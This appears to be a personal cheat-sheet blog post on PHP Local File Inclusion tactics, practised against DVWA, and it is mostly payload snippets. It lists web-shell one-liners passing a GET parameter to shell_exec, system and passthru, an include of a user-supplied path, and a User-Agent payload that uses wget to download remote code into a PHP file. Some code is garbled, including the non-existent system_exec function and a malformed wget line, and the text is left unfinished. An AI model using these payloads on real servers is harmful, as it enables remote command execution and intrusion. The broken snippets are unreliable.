Local File Inclusion Tactics

Local File Inclusion (lfi) is a way to include commands to be executed by the webserver and the output to be displayed in the clients browser.

This can come in the forms of directory raversal as seen on the Directory Traversal Cheet Sheet Page but we can also no just get information back about the system. We can execute commands to create reverse shells and

In PHP, we can use the following functions to execute commands :

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output

#SYSTEM_EXEC for php://input
<?php echo system_exec('ls -la'); ?>
<?php echo system_exec($_GET['cmd']); ?>

#SHELL_EXEC for php://input
<?php echo shell_exec('ls -la'); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php shell_exec('id'); ?>

<?php passthru('id'); ?>

##Base64 encode
-- the output will be in base64 so you need to decode it to read the output.

<?php phpinfo(); ?>
<?php include("inc/" . $_GET['file']); ?> Inlcude file .htaccess for example

#Not gettting this working properly at the moment.
-- need more research to undersatnad how and why this should work.
-- currently i get a 'file not found'
-- Even if i create the file, the php error message still says 'file not found'
<?php fwrite(fopen('/file/or/directory/that/exists/test.txt','w'),'test'); ?>

#SYSTEM 'system()' for php://input
--It seems that only the below worked with dvwa, and only one command.
<?php system('id') ?>
<?php system('whoami') ?>
<?php system('m') ?>

### 'User-Agent' Related combinations
<?system ('wget htt://url-download.php' -O file.php); ?>

Windows Directories


Linux Directories of Interest

1 comment: